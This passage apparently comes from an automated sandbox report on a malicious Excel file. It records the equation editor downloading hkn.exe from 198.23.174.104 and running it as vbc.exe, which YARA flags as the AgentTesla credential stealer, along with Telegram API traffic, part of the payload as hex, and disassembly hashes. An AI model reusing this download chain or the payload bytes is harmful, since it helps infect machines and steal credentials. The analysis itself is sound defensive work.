Apr 8, 2021 12:52:09.545234919 CEST	443	49168	149.154.167.220	192.168.2.22
Apr 8, 2021 12:52:09.545283079 CEST	49168	443	192.168.2.22	149.154.167.220
Apr 8, 2021 12:52:09.592607021 CEST	49168	443	192.168.2.22	149.154.167.220
Apr 8, 2021 12:52:09.646138906 CEST	443	49168	149.154.167.220	192.168.2.22
Apr 8, 2021 12:52:09.849148035 CEST	49168	443	192.168.2.22	149.154.167.220
Apr 8, 2021 12:52:10.247057915 CEST	49168	443	192.168.2.22	149.154.167.220
Apr 8, 2021 12:52:10.288438082 CEST	443	49168	149.154.167.220	192.168.2.22
Apr 8, 2021 12:52:10.292012930 CEST	49168	443	192.168.2.22	149.154.167.220
Apr 8, 2021 12:52:10.378561020 CEST	443	49168	149.154.167.220	192.168.2.22

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 8, 2021 12:52:09.397815943 CEST	52197	53	192.168.2.22	8.8.8.8
Apr 8, 2021 12:52:09.409843922 CEST	53	52197	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Apr 8, 2021 12:52:09.397815943 CEST	192.168.2.22	8.8.8.8	0xd07c	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Apr 8, 2021 12:52:09.409843922 CEST	8.8.8.8	192.168.2.22	0xd07c	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

198.23.174.104

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49167	198.23.174.104	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
Apr 8, 2021 12:50:32.080419064 CEST	0	OUT	GET /hkn.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 198.23.174.104 Connection: Keep-Alive
Apr 8, 2021 12:50:32.198482990 CEST	1	IN	HTTP/1.1 200 OK Date: Thu, 08 Apr 2021 10:50:31 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.27 Last-Modified: Thu, 08 Apr 2021 08:14:53 GMT ETag: "d7200-5bf71a458267a" Accept-Ranges: bytes Content-Length: 881152 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 7d bb 6e 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 2a 0a 00 00 46 03 00 00 00 00 00 66 49 0a 00 00 20 00 00 00 60 0a 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 0d 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 14 49 0a 00 4f 00 00 00 00 60 0a 00 2c 42 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 0d 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 6c 29 0a 00 00 20 00 00 00 2a 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 2c 42 03 00 00 60 0a 00 00 44 03 00 00 2c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 0d 00 00 02 00 00 00 70 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 49 0a 00 00 00 00 00 48 00 00 00 02 00 05 00 80 3f 00 00 cc 48 00 00 03 00 00 00 01 00 00 06 4c 88 00 00 c8 c0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 1f 00 00 0a 28 20 00 00 0a 00 de 02 00 dc 00 28 07 00 00 06 02 6f 21 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 aa 00 02 16 28 22 00 00 0a 00 02 16 28 23 00 00 0a 00 02 17 28 24 00 00 0a 00 02 17 28 25 00 00 0a 00 02 16 28 26 00 00 0a 00 2a 4e 00 02 28 09 00 00 06 6f 6c 00 00 06 28 27 00 00 0a 00 2a 26 00 02 28 28 00 00 0a 00 2a ce 73 29 00 00 0a 80 01 00 00 04 73 2a 00 00 0a 80 02 00 00 04 73 2b 00 00 0a 80 03 00 00 04 73 2c 00 00 0a 80 04 00 00 04 73 2d 00 00 0a 80 05 00 00 04 2a 00 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 2e 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 2f 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 30 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 31 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f 32 00 00 0a 0a 2b 00 06 2a 13 30 02 00 3c 00 00 00 06 00 00 11 00 7e 06 00 00 04 14 28 33 00 00 0a 0b 07 2c 21 72 01 00 00 70 d0 05 00 00 02 28 34 00 00 0a 6f 35 00 00 0a 73 36 00 00 0a 0c 08 80 06 00 00 04 00 00 7e 06 00 00 04 0a 2b 00 06 2a 13 30 01 00 0b 00 00 00 07 00 00 11 00 7e 07 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL}n`PFfI `@ @IO`,B H.textl) `.rsrc,B`D,@@.relocp@BHIH?HL0(( (o!("(#($(%(&N(ol('&((s)ss+s,s-0~o.+0~o/+0~o0+0~o1+0~o2+0<~(3,!rp(4o5s6~+0~
Apr 8, 2021 12:50:32.198522091 CEST	3	IN	Data Raw: 00 04 0a 2b 00 06 2a 22 00 02 80 07 00 00 04 2a 13 30 03 00 26 00 00 00 08 00 00 11 00 28 0b 00 00 06 72 2b 00 00 70 7e 07 00 00 04 6f 37 00 00 0a 28 38 00 00 0a 0b 07 74 26 00 00 01 0a 2b 00 06 2a 00 00 13 30 03 00 26 00 00 00 08 00 00 11 00 28 Data Ascii: +"0&(r+p~o7(8t&+0&(r5p~o7(8t&+s(9ts:(8(;0(o<,(o=*0n~,V~(>
Apr 8, 2021 12:50:32.198553085 CEST	4	IN	Data Raw: 05 16 13 06 2b 16 11 05 11 06 9a 13 07 11 07 28 26 00 00 06 00 00 11 06 17 d6 13 06 11 06 11 05 8e 69 fe 04 13 08 11 08 2d dc 00 00 02 28 6a 00 00 0a 00 de 0d 28 54 00 00 0a 00 28 55 00 00 0a de 00 00 2a 00 00 01 10 00 00 00 00 01 00 6e 6f 00 0d Data Ascii: +(&i-(j(T(Uno30Lr[p(d9%(Tokrcpol,X(UX(U93*0Q(:rp}rp}sm}
Apr 8, 2021 12:50:32.198596001 CEST	5	IN	Data Raw: 6f 96 00 00 0a 00 02 6f 38 00 00 06 72 f1 01 00 70 6f 97 00 00 0a 00 02 6f 38 00 00 06 1f 4b 1f 17 73 98 00 00 0a 6f 99 00 00 0a 00 02 6f 38 00 00 06 17 6f 9a 00 00 0a 00 02 6f 38 00 00 06 72 01 02 00 70 6f 9b 00 00 0a 00 02 6f 38 00 00 06 17 6f Data Ascii: oo8rpoo8Ksoo8oo8rpoo8oo:oo: soo:rpoo:Ksoo:oo:rpoo:o"@"PAs((
Apr 8, 2021 12:50:32.315244913 CEST	7	IN	Data Raw: 00 01 25 16 03 72 45 03 00 70 6f 2b 00 00 06 a2 14 14 14 17 28 c9 00 00 0a 26 02 6f 54 00 00 06 6f c3 00 00 0a 02 6f 54 00 00 06 6f c3 00 00 0a 6f c4 00 00 0a 17 da 6f ca 00 00 0a 0b 07 03 6f cb 00 00 0a 00 07 0a 2b 00 06 2a 00 00 00 1b 30 07 00 Data Ascii: %rEpo+(&oTooToooo+0uoToo+?ot7ot{((oo(d&o-up,upo^_0 (
Apr 8, 2021 12:50:32.315275908 CEST	8	IN	Data Raw: 00 02 28 92 00 00 0a 00 02 6f 52 00 00 06 1f 0a 6f 93 00 00 0a 00 02 6f 52 00 00 06 20 1a 02 00 00 20 49 01 00 00 73 95 00 00 0a 6f 96 00 00 0a 00 02 6f 52 00 00 06 72 aa 06 00 70 6f 97 00 00 0a 00 02 6f 52 00 00 06 1f 25 1f 14 73 98 00 00 0a 6f Data Ascii: (oRooR IsooRrpooR%sooRooRr=pooRooTooT#sooTrpooTooT o sooTooV
Apr 8, 2021 12:50:32.315309048 CEST	10	IN	Data Raw: 7b 24 00 00 04 0b 07 2c 07 07 06 6f aa 00 00 0a 2a 26 02 7b 25 00 00 04 2b 00 2a 22 02 03 7d 25 00 00 04 2a 26 02 7b 26 00 00 04 2b 00 2a 22 02 03 7d 26 00 00 04 2a 26 02 7b 27 00 00 04 2b 00 2a 22 02 03 7d 27 00 00 04 2a 26 02 7b 28 00 00 04 2b Data Ascii: {$,o&{%+"}%&{&+"}&&{'+"}'&{(+07Os{(,o}({(,o*0',o+9~),2~)(4o,rpc
Apr 8, 2021 12:50:32.315332890 CEST	11	IN	Data Raw: a7 0a 0a 00 3c 05 7e 0d 06 00 e7 14 a2 0c 0a 00 3b 07 7e 0d 0a 00 1e 07 7e 0d 16 00 af 09 a7 0a 16 00 3f 11 a7 0a 06 00 f6 18 b4 0d 06 00 aa 00 55 01 06 00 1c 00 55 01 0a 00 54 05 a0 16 0a 00 fb 17 a0 16 06 00 6b 0c c6 00 06 00 d7 0e a2 0c 0a 00 Data Ascii: <~;~~?UUTkU(N(()((((5P(/=B=G~Q
Apr 8, 2021 12:50:32.315356016 CEST	12	IN	Data Raw: 13 08 21 10 d6 05 02 00 e0 21 00 00 00 00 13 08 ed 04 dc 05 02 00 f7 21 00 00 00 00 13 08 f9 04 e2 05 02 00 00 22 00 00 00 00 13 08 9a 14 e9 05 03 00 34 22 00 00 00 00 13 08 14 08 e9 05 03 00 66 22 00 00 00 00 11 18 c9 11 dd 01 03 00 8b 22 00 00 Data Ascii: !!!"4"f""""L#n######E)#)$
Apr 8, 2021 12:50:32.315390110 CEST	14	IN	Data Raw: 4c 3e 00 00 00 00 c6 02 7a 0a 0f 02 50 00 64 3e 00 00 00 00 06 08 01 0d d2 06 50 00 7f 3e 00 00 00 00 06 08 0a 0d d7 06 50 00 ac 3e 00 00 00 00 c6 02 fa 14 b4 04 51 00 cc 3e 00 00 00 00 c6 02 c0 02 48 01 52 00 e4 3e 00 00 00 00 83 00 e5 04 cc 06 Data Ascii: L>zPd>P>P>Q>HR>R?zR?RA?S=TL?T=T555&#)i
Apr 8, 2021 12:50:32.315428972 CEST	15	IN	Data Raw: 44 00 91 0c 94 02 44 00 d6 01 9b 02 a1 01 c3 11 a1 02 a1 01 55 0f 06 00 49 03 c3 11 00 01 a1 01 ff 01 a6 02 41 03 20 16 59 02 21 03 98 04 ad 02 21 03 74 04 ad 02 19 03 5c 16 b2 02 51 03 95 18 b9 02 3c 00 6e 09 8e 02 a9 01 c3 11 06 00 a9 01 27 19 Data Ascii: DDUIA Y!!t\Q<n'U44nHiiqqHqH4yvvqqq\qLYq

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Apr 8, 2021 12:52:09.545206070 CEST	149.154.167.220	443	192.168.2.22	49168	CN=api.telegram.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Tue Mar 24 14:48:17 CET 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004	Mon May 23 18:17:38 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19-5-4,0-10-11-13-23-65281,23-24,0	36f7277af969a6947a61ae0b815907a1
					CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	Tue May 03 09:00:00 CEST 2011	Sat May 03 09:00:00 CEST 2031
					CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Wed Jan 01 08:00:00 CET 2014	Fri May 30 09:00:00 CEST 2031
					OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Tue Jun 29 19:06:20 CEST 2004	Thu Jun 29 19:06:20 CEST 2034

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 2232 Parent PID: 584

General

Start time:	12:49:50
Start date:	08/04/2021
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:	0x13f6d0000
File size:	27641504 bytes
MD5 hash:	5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: EQNEDT32.EXE PID: 2548 Parent PID: 584

General

Start time:	12:50:13
Start date:	08/04/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: vbc.exe PID: 2672 Parent PID: 2548

General

Start time:	12:50:15
Start date:	08/04/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\Public\vbc.exe'
Imagebase:	0xdb0000
File size:	881152 bytes
MD5 hash:	5F968F612F82F74C96DD257793CF917D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2168116812.00000000033AC000.00000004.00000001.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 17%, ReversingLabs
Reputation:	low

Chronological Activities

Analysis Process: vbc.exe PID: 2868 Parent PID: 2672

General

Start time:	12:50:17
Start date:	08/04/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\vbc.exe
Imagebase:	0xdb0000
File size:	881152 bytes
MD5 hash:	5F968F612F82F74C96DD257793CF917D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2380779380.0000000002560000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2380715131.00000000024C1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2380715131.00000000024C1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2380056335.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: vbc.exe PID: 2672 Parent PID: 2548 vbc.exeCOMMON

Executed Functions

Function 00DA0012, Relevance: 5.2, Strings: 4, Instructions: 233COMMON

Download Yara Rule

Strings

`+8k, xrefs: 00DA00B2
&^H", xrefs: 00DA033C
&^H", xrefs: 00DA031E
&^H", xrefs: 00DA0325

Memory Dump Source

Source File: 00000004.00000002.2167571086.0000000000DA0000.00000040.00000001.sdmp, Offset: 00DA0000, based on PE: false

Similarity

API ID:
String ID: &^H"$&^H"$&^H"$`+8k
API String ID: 0-3615993630
Opcode ID: 532fa1df77d6c726aff132499a688f9b990b59ee5d16477bfb1f2e64bf2c0a86
Instruction ID: 408e59c7831816ae916d23773f04215828d60ebc0ed63a4d79e3606f59fa9ce5
Opcode Fuzzy Hash: 532fa1df77d6c726aff132499a688f9b990b59ee5d16477bfb1f2e64bf2c0a86
Instruction Fuzzy Hash: 07A13670E05318CFCB14CFA4D998A9DBFB2FF8A300F24956AD44AA7255DB349941CF25

Uniqueness

Uniqueness Score: -1.00%

Function 00DA0048, Relevance: 5.2, Strings: 4, Instructions: 230COMMON

Download Yara Rule

Strings

`+8k, xrefs: 00DA00B2
&^H", xrefs: 00DA033C
&^H", xrefs: 00DA031E
&^H", xrefs: 00DA0325

Memory Dump Source

Source File: 00000004.00000002.2167571086.0000000000DA0000.00000040.00000001.sdmp, Offset: 00DA0000, based on PE: false

Similarity

API ID:
String ID: &^H"$&^H"$&^H"$`+8k
API String ID: 0-3615993630
Opcode ID: d9866c630dec9d5e55af4d00362b9cbf4f40c433d87cf36ea214867caa452720
Instruction ID: 3a9c0bf74d1646a2f1d0f805977c303c7cbb7a2b651c1b1ebb26ec663fb2a27a
Opcode Fuzzy Hash: d9866c630dec9d5e55af4d00362b9cbf4f40c433d87cf36ea214867caa452720
Instruction Fuzzy Hash: FEA10670D15218CFCF14CFA5D988A9DBBB2FF8A300F209569D44ABB255DB349981CF29

Uniqueness

Uniqueness Score: -1.00%

Function 005327D8, Relevance: 2.7, Strings: 2, Instructions: 166COMMON

Download Yara Rule

Strings

`!Cm, xrefs: 00532933
`!Cm, xrefs: 00532943

Memory Dump Source

Source File: 00000004.00000002.2166621325.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false

Similarity

API ID:
String ID: `!Cm$`!Cm
API String ID: 0-2424362897
Opcode ID: aff24049c31a6e2e58e5618aa27c2171dde7c184f99b415d660af9c791019d98
Instruction ID: bb8e0991cf00a4e2d54b5c792b63acc751adc645bdedac5c8932eded83f35db6
Opcode Fuzzy Hash: aff24049c31a6e2e58e5618aa27c2171dde7c184f99b415d660af9c791019d98
Instruction Fuzzy Hash: 0371A374E00218CFDB18DFE9D584A9EBBF2BF88314F258429E809AB365DB349941CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0053539F, Relevance: 1.7, APIs: 1, Instructions: 242nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 0053F33D

Memory Dump Source

Source File: 00000004.00000002.2166621325.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 2c3142f85a1c85a37c3595c28e039192cf32053723415d4e35f6e77542f85eed
Instruction ID: c54a0bd065359d1f3c917836f534b1e047e4497f224ff71cf309c0a5fef52b58
Opcode Fuzzy Hash: 2c3142f85a1c85a37c3595c28e039192cf32053723415d4e35f6e77542f85eed
Instruction Fuzzy Hash: D6915EB590E7D89FCB03CBA498545CDBFB1AF17214F1940DBD491EB2A3D2289809CB66

Uniqueness

Uniqueness Score: -1.00%

Function 00535404, Relevance: 1.6, APIs: 1, Instructions: 105nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 0053F33D

Memory Dump Source

Source File: 00000004.00000002.2166621325.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: f9e0720379b64512f75e044cc29c64fd19546bac351cb7f31624bb2e9f8b4ce0
Instruction ID: 63ec64e4fa536be19435a12c2fad28b1ce1f349cf5588044889dcac3e1435517
Opcode Fuzzy Hash: f9e0720379b64512f75e044cc29c64fd19546bac351cb7f31624bb2e9f8b4ce0
Instruction Fuzzy Hash: 9A4166B9D002589FCF10CFA9D984ADEFBB5BB59310F20942AE924B7310D375A905CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00DA46BF, Relevance: 1.5, Strings: 1, Instructions: 229COMMON

Download Yara Rule

Strings

5Q8, xrefs: 00DA482A

Memory Dump Source

Source File: 00000004.00000002.2167571086.0000000000DA0000.00000040.00000001.sdmp, Offset: 00DA0000, based on PE: false

Similarity

API ID:
String ID: 5Q8
API String ID: 0-2712333139
Opcode ID: cf895daacca7c8e3ea5c14094cc59376b1907dea39d2229d394bf40b26a06232
Instruction ID: 16eddbaed19dd7364557cfb041693c99f7ef15beadb4fa2877d22a2925a3be21
Opcode Fuzzy Hash: cf895daacca7c8e3ea5c14094cc59376b1907dea39d2229d394bf40b26a06232
Instruction Fuzzy Hash: 67911274E05249DF8B04CFA9C9419DEFBF2EF8A300F20956AD405B7354D7709A428FA5

Uniqueness

Uniqueness Score: -1.00%

Function 005327C8, Relevance: 1.4, Strings: 1, Instructions: 158COMMON

Download Yara Rule

Strings

`!Cm, xrefs: 00532933

Memory Dump Source

Source File: 00000004.00000002.2166621325.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false

Similarity

API ID:
String ID: `!Cm
API String ID: 0-3417966059
Opcode ID: 05ec05df80234cb57aadf54bb74a6a0bde9e230b9dbdd53f933d0dabecbedbb1
Instruction ID: d2e28214e7b959e10fe7add3eab817bd723e3a58c5e3f814bb6cf62b73e45409
Opcode Fuzzy Hash: 05ec05df80234cb57aadf54bb74a6a0bde9e230b9dbdd53f933d0dabecbedbb1
Instruction Fuzzy Hash: 8961A374E00218DFDB18DFE9D884A9EBBF2BF88314F25806AE805AB365D7345945CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00530288, Relevance: .9, Instructions: 949COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2166621325.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 175e395695a91ffd4c3faf9c0d6fc9aefe19cfef185ac04504010be65f2df1a5
Instruction ID: 2de3103ea7afe1e712f6f1f181f9d2efdfbe748f55ff0a97239ab93b097746c1
Opcode Fuzzy Hash: 175e395695a91ffd4c3faf9c0d6fc9aefe19cfef185ac04504010be65f2df1a5
Instruction Fuzzy Hash: 5AA2B034A41258CFD754DF24C898F99B7B1BF4A304F1186EAE90AAB361DB31AD81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00530E20, Relevance: .9, Instructions: 945COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2166621325.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: adc2cd61ca30fe85f34bfa005db38861b72acfd5faf0bdd62a834b9e60f79e17
Instruction ID: 83cc9165f0887af82fc58a2c3e3b3a639511e0f40d5d49b1c008f7eb265c3ed8
Opcode Fuzzy Hash: adc2cd61ca30fe85f34bfa005db38861b72acfd5faf0bdd62a834b9e60f79e17
Instruction Fuzzy Hash: F5A2A034A41258CFD754DF24C898F99B7B1BF4A304F1186EAE90AAB361DB31AD81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00538378, Relevance: .3, Instructions: 302COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2166621325.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bc95ed3a430543729ec312b50de22a80c7561eb42066c3b17d5dfdacd8fc114
Instruction ID: e0cd3b72d7bfbd942fc58eb3d93a6700b628ea6e345441bf456077c26678d7dc
Opcode Fuzzy Hash: 8bc95ed3a430543729ec312b50de22a80c7561eb42066c3b17d5dfdacd8fc114
Instruction Fuzzy Hash: 9CD1EA70D0420ADFCB48CF99D9808AEFBB2FF89301F249959E516A7355D734AA42CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00DA1960, Relevance: .3, Instructions: 252COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2167571086.0000000000DA0000.00000040.00000001.sdmp, Offset: 00DA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3726b6868bf6666396718feaef323332f631f569a7d5d627d771d3875ad8266
Instruction ID: f7f2ec6232c6ede46286a79c2220b45b62639c3b1af61b123b0de43ae9a11d2d
Opcode Fuzzy Hash: c3726b6868bf6666396718feaef323332f631f569a7d5d627d771d3875ad8266
Instruction Fuzzy Hash: 70A13478E012198FCB44CFE9C5406DEFBF2BF8A314F64852AC419A7318E7349942CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00DA1950, Relevance: .2, Instructions: 248COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2167571086.0000000000DA0000.00000040.00000001.sdmp, Offset: 00DA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24e4aa891c0f4df2c217f9fe427625993b2cf4a9bbbb99f8a2abcbe4ea06dee1
Instruction ID: 47e4bd85f7edbce78c39b8bde0056e53a29d64f0661a1a312ef1d66325723e0b
Opcode Fuzzy Hash: 24e4aa891c0f4df2c217f9fe427625993b2cf4a9bbbb99f8a2abcbe4ea06dee1
Instruction Fuzzy Hash: C4A13378E012198FCB44CFE9C5405DEFBF2BF8A314F64852AC459AB358E7349942CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00533DA0, Relevance: .2, Instructions: 241COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2166621325.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c12e84f79d1ede845316cb2b78b9a076fcebb34b5aefd42cc26468abf0d4358
Instruction ID: e2503f8133c2fa2a5863f6deea0c6ffa5f4adb0d9e847fb0a867f8507ab812bb
Opcode Fuzzy Hash: 2c12e84f79d1ede845316cb2b78b9a076fcebb34b5aefd42cc26468abf0d4358
Instruction Fuzzy Hash: 2AA10470E002198FCB04DFE9C5846EEBBF6BF88315F648529D519AB359EB349A41CF60

Uniqueness

Uniqueness Score: -1.00%

Function 005339C1, Relevance: .2, Instructions: 227COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2166621325.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06fd7c4f7e22ec7e961f59963847b36742b19b30f85dee5b6978ae5d0aa453a8
Instruction ID: 240864f566a28a819eabbdcbd7ec67e67b639fccdece2cb618850d4e775b2de5
Opcode Fuzzy Hash: 06fd7c4f7e22ec7e961f59963847b36742b19b30f85dee5b6978ae5d0aa453a8
